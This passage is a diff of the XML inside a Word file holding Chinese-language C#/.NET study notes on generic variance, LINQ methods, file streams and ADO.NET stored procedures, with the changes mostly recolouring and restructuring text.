+        <w:t>支持</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>隐式转换</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，可以将方法的返回值设置为</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，不能把</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>作为输入参数</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3893,8 +3990,15 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>抗变：抗变类型用</w:t>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>抗变</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：抗变类型用</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3906,7 +4010,26 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>参数标注，泛型接口就是抗变的，这样泛型类型</w:t>
+        <w:t>参数标注，泛型接口就是抗变的，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>支持</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>强制转换</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，可以将</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3918,7 +4041,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>就只能把</w:t>
+        <w:t>作为输入参数，不能将</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3930,7 +4053,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>作为参数输入</w:t>
+        <w:t>设置为返回值。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3946,6 +4069,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>泛型方法：除了定义泛型类之外，还可以定义泛型方法，在方法声明中可以定义泛型类。泛型方法可以在非泛型类中定义。</w:t>
       </w:r>
     </w:p>
@@ -3992,7 +4116,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Linq to sql / Linq to DataSet / Linq to Object / Linq to Xml</w:t>
       </w:r>
     </w:p>
@@ -4524,7 +4647,8 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="7"/>
         </w:numPr>
-        <w:ind w:left="450"/>
+        <w:ind w:left="448" w:hanging="357"/>
+        <w:outlineLvl w:val="2"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
           <w:color w:val="0070C0"/>
@@ -4649,16 +4773,112 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>该方法的委托参数第一个参数TSource表示数据源，返回值为bool</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+        <w:rPr>
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
           <w:szCs w:val="21"/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:ind w:left="448" w:hanging="357"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>SelectMany()</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>方法</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>SelectMany&lt;TSource,TResult&gt;(this IEnumerable&lt;TSource&gt; source, Func&lt;TSource, IEnumerable&lt;TResult&gt;&gt; selector);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>该方法的委托参数第一个参数TSource表示数据源，返回值为bool</w:t>
+        <w:t>该方法的委托参数第一个参数TSource表示数据源，返回值为合并后的集合</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4670,38 +4890,15 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:color w:val="0070C0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="0070C0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>SelectMany()</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="0070C0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>方法</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="0070C0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>:</w:t>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>SelectMany&lt;TSource, TCollection, TResult&gt;(this IEnumerable&lt;TSource&gt; source, Func&lt;TSource, IEnumerable&lt;TCollection&gt;&gt; collectionSelector, Func&lt;TSource, TCollection, TResult&gt; resultSelector);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4713,16 +4910,28 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:szCs w:val="21"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>SelectMany&lt;TSource,TResult&gt;(this IEnumerable&lt;TSource&gt; source, Func&lt;TSource, IEnumerable&lt;TResult&gt;&gt; selector);</w:t>
-      </w:r>
+        <w:t>该方法的第一个委托参数第一个参数TSource表示数据源，返回值为合并后的集合，第二个委托参数第一个参数TSource表示相同的数据源，第二个参数表示第一个委托参数的返回值(集合)，第三个参数表示合并后的集合</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+        <w:rPr>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4731,67 +4940,8 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="7"/>
         </w:numPr>
-        <w:ind w:left="450"/>
-        <w:rPr>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>该方法的委托参数第一个参数TSource表示数据源，返回值为合并后的集合</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-        <w:rPr>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>SelectMany&lt;TSource, TCollection, TResult&gt;(this IEnumerable&lt;TSource&gt; source, Func&lt;TSource, IEnumerable&lt;TCollection&gt;&gt; collectionSelector, Func&lt;TSource, TCollection, TResult&gt; resultSelector);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-        <w:rPr>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>该方法的第一个委托参数第一个参数TSource表示数据源，返回值为合并后的集合，第二个委托参数第一个参数TSource表示相同的数据源，第二个参数表示第一个委托参数的返回值(集合)，第三个参数表示合并后的集合</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
+        <w:ind w:left="448" w:hanging="357"/>
+        <w:outlineLvl w:val="2"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
           <w:szCs w:val="21"/>
@@ -4844,6 +4994,7 @@
           <w:color w:val="000000"/>
           <w:szCs w:val="21"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>OrderBy&lt;</w:t>
       </w:r>
       <w:r>
@@ -4904,7 +5055,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
           <w:szCs w:val="21"/>
         </w:rPr>
       </w:pPr>
@@ -4920,11 +5071,24 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="7"/>
         </w:numPr>
-        <w:ind w:left="450"/>
+        <w:ind w:left="448" w:hanging="357"/>
+        <w:outlineLvl w:val="2"/>
         <w:rPr>
           <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:szCs w:val="21"/>
@@ -4989,7 +5153,6 @@
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>第一个委托参数TSource表示数据源，返回值表示分组的关键字名称。</w:t>
       </w:r>
       <w:r>
@@ -5979,6 +6142,7 @@
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>XPathNavigator也可以读写XML文档，特点是可以通过XPath语句访问到指定元素。要注意的是，只用通过XMLDocument创建的对象才可以修改文件，通过XMLPathDocument创建的对象是只读的。。</w:t>
       </w:r>
     </w:p>
@@ -6108,7 +6272,6 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>我们可以在</w:t>
       </w:r>
       <w:r>
@@ -6641,10 +6804,14 @@
           <w:numId w:val="9"/>
         </w:numPr>
         <w:ind w:left="450"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
         </w:rPr>
         <w:t>ReadLines()</w:t>
       </w:r>
@@ -6681,13 +6848,14 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
-          <w:color w:val="FF0000"/>
+          <w:color w:val="00B050"/>
         </w:rPr>
         <w:t>这个新增的方法要高效很多</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="00B050"/>
         </w:rPr>
         <w:t>，它不是将所有行一次性加载进内存中，而是每次读取一行。</w:t>
       </w:r>
@@ -6700,6 +6868,9 @@
           <w:numId w:val="9"/>
         </w:numPr>
         <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -6707,6 +6878,14 @@
         </w:rPr>
         <w:t>如果要打开一个很大的文件，之前的方法要等整个文件都加入内存中，才能访问第一行。而这个新方法每次只读取一行，更加高效。</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6897,7 +7076,14 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>System.IO,MemoryStream</w:t>
+        <w:t>System.IO,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>MemoryStream</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6926,7 +7112,14 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>System.Net.Sockets.NetworkStream</w:t>
+        <w:t>System.Net.Sockets.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>NetworkStream</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6994,14 +7187,22 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
         </w:rPr>
         <w:t>DeflateStream</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>压缩数据，然后写入到</w:t>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>压缩数据</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，然后写入到</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7081,11 +7282,13 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>使用</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
         </w:rPr>
         <w:t>FileStream</w:t>
       </w:r>
@@ -7093,7 +7296,20 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>类读写文本文件，需要使用字节数组。有更简单的方法：使用读取器</w:t>
+        <w:t>类</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>读写文本文件</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，需要使用字节数组。有更简单的方法：使用读取器</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7120,17 +7336,6 @@
         <w:t>，使用它们无需处理字节数组和编码，比较轻松。</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="9"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-      </w:pPr>
-    </w:p>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
@@ -7179,7 +7384,6 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>原生的</w:t>
       </w:r>
       <w:r>
@@ -8043,6 +8247,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>赋予</w:t>
       </w:r>
       <w:r>
@@ -8114,89 +8319,83 @@
           <w:numId w:val="11"/>
         </w:numPr>
         <w:ind w:left="900"/>
+        <w:rPr>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>存储过程</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:ind w:left="900"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>设置调用的是存储过程，而非SQL语句：command.CommandType = CommandType.StoredProcedure;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:ind w:left="900"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>将参数传出去：adapter.SelectCommand = command;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="1440"/>
+        </w:tabs>
+        <w:jc w:val="left"/>
         <w:rPr>
           <w:color w:val="70AD47" w:themeColor="accent6"/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:color w:val="70AD47" w:themeColor="accent6"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>存储过程</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="11"/>
-        </w:numPr>
-        <w:ind w:left="900"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:color w:val="70AD47" w:themeColor="accent6"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">设置调用的是存储过程，而非SQL语句：command.CommandType = </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
-          <w:color w:val="2B91AF"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>CommandType</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>.StoredProcedure;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="11"/>
-        </w:numPr>
-        <w:ind w:left="900"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:color w:val="70AD47" w:themeColor="accent6"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>将参数传出去：adapter.SelectCommand = command;</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8250,7 +8449,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>EF</w:t>
       </w:r>
     </w:p>
@@ -8564,10 +8762,12 @@
           <w:numId w:val="16"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1350"/>
+        <w:ind w:left="1349" w:hanging="357"/>
+        <w:outlineLvl w:val="2"/>
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="0070C0"/>
           <w:szCs w:val="21"/>
         </w:rPr>
       </w:pPr>
@@ -8576,7 +8776,7 @@
           <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="333333"/>
+          <w:color w:val="0070C0"/>
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
@@ -8587,7 +8787,7 @@
           <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="333333"/>
+          <w:color w:val="0070C0"/>
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
@@ -8598,7 +8798,7 @@
           <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="333333"/>
+          <w:color w:val="0070C0"/>
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
@@ -8615,6 +8815,7 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="1350"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
@@ -8699,6 +8900,19 @@
         </w:rPr>
         <w:t>方法使用同步方法的所有输出参数，并按照同步方法的返回类型来返回结果。</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="2160"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8708,10 +8922,12 @@
           <w:numId w:val="16"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1350"/>
+        <w:ind w:left="1349" w:hanging="357"/>
+        <w:outlineLvl w:val="2"/>
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="0070C0"/>
           <w:szCs w:val="21"/>
         </w:rPr>
       </w:pPr>
@@ -8720,7 +8936,7 @@
           <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="333333"/>
+          <w:color w:val="0070C0"/>
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
@@ -8731,7 +8947,7 @@
           <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
           <w:b/>
